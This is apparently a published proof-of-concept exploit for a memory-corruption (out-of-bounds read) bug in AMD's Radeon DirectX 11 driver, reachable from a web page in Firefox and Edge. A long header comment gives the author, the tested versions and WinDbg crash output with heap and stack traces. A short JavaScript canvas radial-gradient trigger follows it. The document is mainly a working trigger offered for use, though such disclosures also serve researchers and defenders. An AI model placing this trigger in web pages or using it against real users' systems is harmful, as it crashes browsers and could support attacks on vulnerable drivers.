/* Title : Advanced Micro Devices, Inc. Radeon DirectX 11 Driver (Firefox/MS Edge) Memory Corruption Date : 10.04.2020 Exploit Author : Marcin Ressel Vendor Homepage : https://www.amd.com/ Software Link: n/a Version: 8.17.10.0871 (atidxx64.dll) Tested on: Windows 10 home, AMD64 Family 23 Model 24 Stepping 1 AuthenticAMD ~2100 Mhz, Firefox 74.0 (64 bity) MS Edge ---- 24a5122ef60 - 24a512270f0 = 0x7E70 && 0x7f10 - 0x7E70 = A0 = offset = OUT_OF_BOUNDS READ ---- 0:123> g (2560.1f28): Access violation - code c0000005 (!!! second chance !!!) atidxx64!AmdDxGsaFreeCompiledShader+0x45901d: 00007ffc`994cfecd 83bba000000013 cmp dword ptr [rbx+0A0h],13h ds:0000024a`5122f000=???????? 0:123> !heap -p -a @rbx 24a512270f0 address 0000024a5122ef60 found in _DPH_HEAP_ROOT @ 24a50701000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 24a653f10d0: 24a512270f0 7f10 - 24a51227000 9000 00007ffca7204847 ntdll!RtlDebugAllocateHeap+0x000000000000003f 00007ffca71b4a16 ntdll!RtlpAllocateHeap+0x0000000000077b26 00007ffca713babb ntdll!RtlpAllocateHeapInternal+0x00000000000001cb 00007ffc99378a05 atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000301b55 00007ffc996af263 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000006383b3 00007ffc996ae802 atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000637952 00007ffc993e9891 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000003729e1 00007ffc9917a7db atidxx64!AmdDxGsaFreeCompiledShader+0x000000000010392b 00007ffc9917949b atidxx64!AmdDxGsaFreeCompiledShader+0x00000000001025eb 00007ffc99169680 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000000f27d0 00007ffc99148e8a atidxx64!AmdDxGsaFreeCompiledShader+0x00000000000d1fda 00007ffc990951f4 atidxx64!AmdDxGsaFreeCompiledShader+0x000000000001e344 00007ffc998509ce atidxx64!AmdDxGsaFreeCompiledShader+0x00000000007d9b1e 00007ffc9984b950 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000007d4aa0 00007ffc99826a26 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000007afb76 00007ffc990aedcb atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000037f1b 00007ffc990ae6a9 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000000377f9 00007ffc99952114 atidxx64!AmdLiquidVrD3D11WrapDeviceContext+0x00000000000a4654 00007ffca6747bd4 KERNEL32!BaseThreadInitThunk+0x0000000000000014 00007ffca716ced1 ntdll!RtlUserThreadStart+0x0000000000000021 0:123> kb # RetAddr : Args to Child : Call Site 00 00007ffc`994b4f3e : 0000024a`5122db98 0000024a`50dcef01 0000024a`5c27b600 0000024a`51228650 : atidxx64!AmdDxGsaFreeCompiledShader+0x45901d 01 00007ffc`99166094 : 0000024a`00000000 0000024a`00000000 0000024a`51211fc0 00000056`0743ec89 : atidxx64!AmdDxGsaFreeCompiledShader+0x43e08e 02 00007ffc`9917a1d3 : 0000024a`5122db80 0000024a`51211fc0 0000024a`0000002d 0000024a`51211fc0 : atidxx64!AmdDxGsaFreeCompiledShader+0xef1e4 03 00007ffc`99169680 : 0000024a`60901a50 0000024a`50e63108 00000000`00000002 0000024a`60901a50 : atidxx64!AmdDxGsaFreeCompiledShader+0x103323 04 00007ffc`99148e8a : 0000024a`60901a50 0000024a`50ddb1f0 0000024a`50dd6400 0000024a`60901a50 : atidxx64!AmdDxGsaFreeCompiledShader+0xf27d0 05 00007ffc`990951f4 : 00000000`00000001 0000024a`50dd6400 0000024a`50ddb1f0 0000024a`50ae0ec0 : atidxx64!AmdDxGsaFreeCompiledShader+0xd1fda 06 00007ffc`998509ce : 00000000`00000000 00000056`0743f5a0 0000024a`50dd6400 0000024a`5085c4c0 : atidxx64!AmdDxGsaFreeCompiledShader+0x1e344 07 00007ffc`9984b950 : 0000024a`00000000 0000024a`507d7d08 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7d9b1e 08 00007ffc`99826a26 : 00000000`00000000 00000000`00000000 0000024a`50cfafe0 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7d4aa0 09 00007ffc`990aedcb : 0000024a`50cfafe0 00000000`00000000 0000024a`5dc8ffd0 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7afb76 0a 00007ffc`990ae6a9 : 00000000`00000000 0000024a`57423fd0 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x37f1b 0b 00007ffc`99952114 : 0000024a`57423fd0 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x377f9 0c 00007ffc`a6747bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdLiquidVrD3D11WrapDeviceContext+0xa4654 0d 00007ffc`a716ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14 0e 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21 */ var canvas=document.createElement("canvas"); document.body.appendChild(canvas); var context = canvas.getContext("2d") function radioActiveGradient() { var ret = context.createRadialGradient(1,1,0,1,0.6898449305444956,1); ret.addColorStop(0,"rgb(1,1,1)"); return ret; } context.arc(1,0.6898449305444956,1,0,1); context.strokeStyle=radioActiveGradient(); context.stroke()